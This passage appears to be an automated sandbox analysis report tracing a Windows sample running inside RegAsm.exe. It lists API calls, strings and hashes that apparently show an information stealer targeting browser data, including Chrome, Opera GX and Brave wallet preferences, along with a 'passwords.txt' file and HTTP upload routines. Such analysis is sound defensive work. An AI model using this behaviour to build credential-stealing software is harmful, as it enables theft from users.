Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_450000_file.jbxd

Yara matches

Similarity

API ID: FilePointer$ErrorLast
String ID:
API String ID: 142388799-0
Opcode ID: 57d086352e129de23eb8c72a5b19d5008727f7a3b7ea2d7399dee953bffabe00
Instruction ID: 6a58f0a310606d0e489dab38164e8a001a6d22394d130cfb135d798be1683faa
Opcode Fuzzy Hash: 57d086352e129de23eb8c72a5b19d5008727f7a3b7ea2d7399dee953bffabe00
Instruction Fuzzy Hash: 7F117C71904158BBCF119F66DC489DF7F79EF05365F104146F924A22B0C775DA44EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00538B41 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00538B67

Part of subcall function 00538993: __fltout2.LIBCMT ref: 005389BE

__cftog_l.LIBCMT ref: 00538B8D
__cftoe_l.LIBCMT ref: 00538BBF

Memory Dump Source

Source File: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true

Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_450000_file.jbxd

Yara matches

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction ID: 265802882c011b45931b8dab0ce8665427302526ff4a013055926e7920ff6b6f
Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction Fuzzy Hash: 83115E7200024EBBCF5A5E84CC55CFE7F26BF58354F588455FA2859031DB36CAB1AB81

Uniqueness

Uniqueness Score: -1.00%

Function 005394C8 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 005394D4

Part of subcall function 00539E2C: __getptd_noexit.LIBCMT ref: 00539E2F
Part of subcall function 00539E2C: __amsg_exit.LIBCMT ref: 00539E3C

__amsg_exit.LIBCMT ref: 005394F4
__lock.LIBCMT ref: 00539504
_free.LIBCMT ref: 00539534

Memory Dump Source

Source File: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true

Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_450000_file.jbxd

Yara matches

Similarity

API ID: __amsg_exit$__getptd__getptd_noexit__lock_free
String ID:
API String ID: 3170801528-0
Opcode ID: 4475b636f4b6daa432483bfe3b8c9abc6dfeee5bf802842ed03bec2671514418
Instruction ID: 56318afd035f4659b71360bc7bfe58f66f7a633ca41aa91d483472d2c21efa97
Opcode Fuzzy Hash: 4475b636f4b6daa432483bfe3b8c9abc6dfeee5bf802842ed03bec2671514418
Instruction Fuzzy Hash: B101DDB1D01712ABDB26EF64A44A75D7F60BF80720F045115F44567281CBB46DC2CFE9

Uniqueness

Uniqueness Score: -1.00%

Function 004FEAEE Relevance: 6.0, APIs: 4, Instructions: 32COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 004FEB08
GetLastError.KERNEL32 ref: 004FEB14
___initconout.LIBCMT ref: 004FEB24

Part of subcall function 004FEBA2: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,004FEB29), ref: 004FEBB5

WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 004FEB38

Memory Dump Source

Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true

Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_450000_file.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CreateErrorFileLast___initconout
String ID:
API String ID: 3431868840-0
Opcode ID: ce382ce60cb9a0525e661e2f6f9159153216a64f1a76c414db601adf1eedcdeb
Instruction ID: 1565e3b066c91303592beabc3d1dfe8ee9aef10dcb79466a59672929d79de011
Opcode Fuzzy Hash: ce382ce60cb9a0525e661e2f6f9159153216a64f1a76c414db601adf1eedcdeb
Instruction Fuzzy Hash: 9FF08236100504BBCB221F9BDC05D57BFB7EFDA722B14481AFB4A93530DA31A814EB21

Uniqueness

Uniqueness Score: -1.00%

Function 004FEC0A Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 004FEC21
GetLastError.KERNEL32 ref: 004FEC2D
___initconout.LIBCMT ref: 004FEC3D

Part of subcall function 004FEBA2: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,004FEB29), ref: 004FEBB5

WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 004FEC52

Memory Dump Source

Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true

Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_450000_file.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CreateErrorFileLast___initconout
String ID:
API String ID: 3431868840-0
Opcode ID: 83f1f6e7f41d835b507b182ec8f56301a6d21b82504ebf8ece5993456dfc2956
Instruction ID: 1bc7158fade6ae130a37a529a94a50895d79f73d8da36ca92c3cd6d01f3258a8
Opcode Fuzzy Hash: 83f1f6e7f41d835b507b182ec8f56301a6d21b82504ebf8ece5993456dfc2956
Instruction Fuzzy Hash: 17F01C36500619BBCF621F96DC0999A3F26FF1A3A2F004016FE0997130D6368924FB94

Uniqueness

Uniqueness Score: -1.00%

Function 004E5CB1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65COMMON

Download Yara Rule

Strings

InitializeCriticalSectionEx, xrefs: 004E5D11
GetXStateFeaturesMask, xrefs: 004E5CC1

Memory Dump Source

Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true

Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_450000_file.jbxd

Yara matches

Similarity

API ID:
String ID: GetXStateFeaturesMask$InitializeCriticalSectionEx
API String ID: 0-4196971266
Opcode ID: b6edca5047ecb5dbeadcfd82669da499798b53eb31e171b93cdc83c0b4e9f940
Instruction ID: 6343cc578be647c10870d5d8240f6f7f5053dc25283f24e28174bbfa60e73565
Opcode Fuzzy Hash: b6edca5047ecb5dbeadcfd82669da499798b53eb31e171b93cdc83c0b4e9f940
Instruction Fuzzy Hash: 9801DB3568021877DB112B56CC0AEDE7F15FB50BB6F004422FD2C16160D6F58975D7D5

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: RegAsm.exePID: 2632, Parent PID: 4092COMMON

Execution Graph

Execution Coverage:	5.2%
Dynamic/Decrypted Code Coverage:	0.9%
Signature Coverage:	9.9%
Total number of Nodes:	2000
Total number of Limit Nodes:	35

Executed Functions

Function 00418970 Relevance: 63.2, APIs: 34, Strings: 2, Instructions: 208
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(kernel32.dll,0041887A), ref: 00418975
GetProcAddress.KERNEL32(00000000,0144F198), ref: 00418990
GetProcAddress.KERNEL32(76210000,0144F228), ref: 004189BD
GetProcAddress.KERNEL32(76210000,0144F240), ref: 004189D6
GetProcAddress.KERNEL32(76210000,0144F450), ref: 004189EE
GetProcAddress.KERNEL32(76210000,0144F498), ref: 00418A06
GetProcAddress.KERNEL32(76210000,01453258), ref: 00418A1F
GetProcAddress.KERNEL32(76210000,014529C0), ref: 00418A37
GetProcAddress.KERNEL32(76210000,01452AA0), ref: 00418A4F
GetProcAddress.KERNEL32(76210000,0144F4B0), ref: 00418A68
GetProcAddress.KERNEL32(76210000,0144F4C8), ref: 00418A80
GetProcAddress.KERNEL32(76210000,0144F4E0), ref: 00418A98
GetProcAddress.KERNEL32(76210000,0144F4F8), ref: 00418AB1
GetProcAddress.KERNEL32(76210000,01452BC0), ref: 00418AC9
GetProcAddress.KERNEL32(76210000,0144F468), ref: 00418AE1
GetProcAddress.KERNEL32(76210000,0144F510), ref: 00418AFA
GetProcAddress.KERNEL32(76210000,01452940), ref: 00418B12
GetProcAddress.KERNEL32(76210000,0144F480), ref: 00418B2A
GetProcAddress.KERNEL32(76210000,0144C750), ref: 00418B43
GetProcAddress.KERNEL32(76210000,01452B60), ref: 00418B5B
GetProcAddress.KERNEL32(76210000,0144C7B0), ref: 00418B73
GetProcAddress.KERNEL32(76210000,01452A40), ref: 00418B8C
LoadLibraryA.KERNEL32(0145DBE8), ref: 00418B9D
LoadLibraryA.KERNEL32(0145DC48), ref: 00418BAF
LoadLibraryA.KERNEL32(0145DA98), ref: 00418BC1
LoadLibraryA.KERNEL32(0145DAE0), ref: 00418BD2
LoadLibraryA.KERNEL32(0145DAF8), ref: 00418BE4
GetProcAddress.KERNEL32(75B30000,0145DB58), ref: 00418C00
GetProcAddress.KERNEL32(751E0000,0145DAB0), ref: 00418C1C
GetProcAddress.KERNEL32(751E0000,0145DC78), ref: 00418C34
GetProcAddress.KERNEL32(76910000,0145DC00), ref: 00418C50
GetProcAddress.KERNEL32(75670000,014528E0), ref: 00418C6C
GetProcAddress.KERNEL32(77310000,014532A8), ref: 00418C88
GetProcAddress.KERNEL32(77310000,NtQueryInformationProcess), ref: 00418C9F

Strings

kernel32.dll, xrefs: 00418970
NtQueryInformationProcess, xrefs: 00418C94

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: NtQueryInformationProcess$kernel32.dll
API String ID: 2238633743-258108907
Opcode ID: d3dc7f79465fd81c2f6d2aeca6bccb15f19688e2caa800e74057db0e9ec5c149
Instruction ID: 54f81618b0003c9a7d9cd87b1105554b9cb69cd8690f86f09dc99c509db4cf5f
Opcode Fuzzy Hash: d3dc7f79465fd81c2f6d2aeca6bccb15f19688e2caa800e74057db0e9ec5c149
Instruction Fuzzy Hash: 3D9134BDA002029FD744DFA4EC6896637FBF78EB413A06519FA05C7360EB349885CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00416740 Relevance: 49.3, APIs: 23, Strings: 5, Instructions: 334
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 0041677A
FindFirstFileA.KERNEL32(?,?,?,00416D98,00416EE5), ref: 00416791
memset.MSVCRT ref: 004167A9
memset.MSVCRT ref: 004167BB
StrCmpCA.SHLWAPI(?,00428648,?,?,?,?,?,?,?,00416D98,00416EE5), ref: 0041680C
StrCmpCA.SHLWAPI(?,0042864C,?,?,?,?,?,?,?,00416D98,00416EE5), ref: 00416826
wsprintfA.USER32 ref: 0041684B
StrCmpCA.SHLWAPI(?,0042835F,?,?,?,?,?,?,?,?,?,?,?,00416D98,00416EE5), ref: 0041685D
wsprintfA.USER32 ref: 00416885
memset.MSVCRT ref: 004168BD
lstrcat.KERNEL32(?,?), ref: 004168D0
strtok_s.MSVCRT ref: 004168E6
strtok_s.MSVCRT ref: 00416913
memset.MSVCRT ref: 0041692C
lstrcat.KERNEL32(?,?), ref: 0041693C
strtok_s.MSVCRT ref: 00416952
PathMatchSpecA.SHLWAPI(?,00000000), ref: 0041696A

Strings

%s\%s, xrefs: 004168A1
%s\%s\%s, xrefs: 0041687F
%s\%s, xrefs: 00416845
%s\*.*, xrefs: 0041676F
%s%s, xrefs: 004169A3

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: memset$strtok_swsprintf$lstrcat$FileFindFirstMatchPathSpec
String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*.*
API String ID: 1425701045-3225784412
Opcode ID: 3b7b0d47180c14f6fa3057f77056ec7edab7d5e3ddc63e7905401cf4b7c79e42
Instruction ID: 9df80aab3b2c67129cd77f9efb50d4b945a18d7e013ca70540632bd8ef74930f
Opcode Fuzzy Hash: 3b7b0d47180c14f6fa3057f77056ec7edab7d5e3ddc63e7905401cf4b7c79e42
Instruction Fuzzy Hash: 16C1DAB5900209ABCB14DFA4DC85EEE77B8EF49704F50855EF505A3281DB389E88CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040D4F0 Relevance: 42.9, APIs: 18, Strings: 6, Instructions: 913
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,014532E8,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

FindFirstFileA.KERNEL32(00000000,?,00427A9B,00427A9A,00000000,?,00427BDC,?,?,00427A97,?,00000000,00000005), ref: 0040D5A4
StrCmpCA.SHLWAPI(?,00427BE0), ref: 0040D61C
StrCmpCA.SHLWAPI(?,00427BE4), ref: 0040D636
StrCmpCA.SHLWAPI(00000000,Opera GX,00000000,?,?,?,00427BE8,?,?,00427A9E), ref: 0040D6E7

Strings

Google Chrome, xrefs: 0040DE2B
\BraveWallet\Preferences, xrefs: 0040D9E4
Opera GX, xrefs: 0040D6D6
Brave, xrefs: 0040D8DF
Preferences, xrefs: 0040D8FE
F, xrefs: 0040E179

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
String ID: Brave$F$Google Chrome$Opera GX$Preferences$\BraveWallet\Preferences
API String ID: 2567437900-1653842991
Opcode ID: 66968d6378468335f2f30316b3ce1fc2dace5581682e8e8ae86198f47f539a7c
Instruction ID: 52dee1824ab0a65af1c6b66960748f4e36746aede80700b1bdbde72769120ff5
Opcode Fuzzy Hash: 66968d6378468335f2f30316b3ce1fc2dace5581682e8e8ae86198f47f539a7c
Instruction Fuzzy Hash: 32829370900248EADB15EBA5C955BDDBBB86F19304F1040AEF945B32C2DF781B4CCBA6

Uniqueness

Uniqueness Score: -1.00%

Function 0040D090 Relevance: 40.6, APIs: 22, Strings: 1, Instructions: 335
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,014532E8,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

Part of subcall function 004114D0: GetSystemTime.KERNEL32(?,014625C8,00428288,?,00000000,00000000,004283A2,00000000,?,00000000,00423261,000000FF,?,00418949), ref: 00411525

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,00000000,?), ref: 0040D149
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040D1E2
RtlAllocateHeap.NTDLL(00000000), ref: 0040D1E9
lstrlen.KERNEL32(00000000,00000000), ref: 0040D296
lstrcat.KERNEL32(000000FF,0145F650), ref: 0040D2B0
lstrcat.KERNEL32(000000FF,00000000), ref: 0040D2C3

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Part of subcall function 00411AA0: memset.MSVCRT ref: 00411AD5
Part of subcall function 00411AA0: GetProcessHeap.KERNEL32(00000000,000000FA,?,00000000,?,004075E6,0040DC76), ref: 00411B06
Part of subcall function 00411AA0: HeapAlloc.KERNEL32(00000000,?,004075E6,0040DC76), ref: 00411B0D
Part of subcall function 00411AA0: wsprintfW.USER32 ref: 00411B1C
Part of subcall function 00411AA0: OpenProcess.KERNEL32(00001001,00000000), ref: 00411B7D
Part of subcall function 00411AA0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00411B8C
Part of subcall function 00411AA0: CloseHandle.KERNEL32(00000000), ref: 00411B93

lstrcat.KERNEL32(000000FF,00427A6C), ref: 0040D2D2
lstrcat.KERNEL32(000000FF,00000000), ref: 0040D2E5
lstrcat.KERNEL32(000000FF,00427A70), ref: 0040D2F4
lstrcat.KERNEL32(000000FF,0145F5C0), ref: 0040D305
lstrcat.KERNEL32(000000FF,00000000), ref: 0040D318
lstrcat.KERNEL32(000000FF,00427A74), ref: 0040D327
lstrcat.KERNEL32(000000FF,0145F5B0), ref: 0040D338
lstrcat.KERNEL32(000000FF,00000000), ref: 0040D34B
lstrcat.KERNEL32(000000FF,00427A78), ref: 0040D35A
lstrcat.KERNEL32(000000FF,014620E8), ref: 0040D36A
lstrcat.KERNEL32(000000FF,00000000), ref: 0040D37D
lstrcat.KERNEL32(000000FF,00427A7C), ref: 0040D38C
lstrcat.KERNEL32(000000FF,00427A80), ref: 0040D39B
lstrlen.KERNEL32(000000FF), ref: 0040D3D3
memset.MSVCRT ref: 0040D428
DeleteFileA.KERNEL32(00000000), ref: 0040D458

Strings

passwords.txt, xrefs: 0040D3E6

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$HeapProcess$lstrlen$Filememset$AllocAllocateCloseCopyDeleteHandleOpenSystemTerminateTimewsprintf
String ID: passwords.txt
API String ID: 4049833551-347816968
Opcode ID: 6b7e045d715a30179db2ed82f8fee990826387843a50ed3a242fddfd15f67ff1
Instruction ID: 215b863f2430d563b93ca64cb16b4ae420a8412cb18fc12b55f4b5a4a6015adc
Opcode Fuzzy Hash: 6b7e045d715a30179db2ed82f8fee990826387843a50ed3a242fddfd15f67ff1
Instruction Fuzzy Hash: 55D17474900209ABCB04EBE4DC56BEEBB79AF19304F50452EF911B3291DF785A48CBB5

Uniqueness

Uniqueness Score: -1.00%

Function 00404490 Relevance: 37.3, APIs: 13, Strings: 8, Instructions: 537
networkfilestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 00404412
Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 0040441F
Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 0040442C
Part of subcall function 004043C0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00404446
Part of subcall function 004043C0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404456

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040455A
StrCmpCA.SHLWAPI(?,0145F7A0,?,?,?,?,?,?,00000000), ref: 0040457A

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404704
HttpOpenRequestA.WININET(00000000,0145F8C0,?,01462F48,00000000,00000000,-00400100,00000000), ref: 00404745
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 0040476B

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,014532E8,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

lstrlen.KERNEL32(00000000,00000000,004201A9,?,?,?,00427895,00000000,004201A9,?,00000000,004201A9,",00000000,004201A9,build_id), ref: 00404A3A
lstrlen.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00404A53
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404A64
InternetReadFile.WININET(00000000,?,000007CF,00000000), ref: 00404A7B
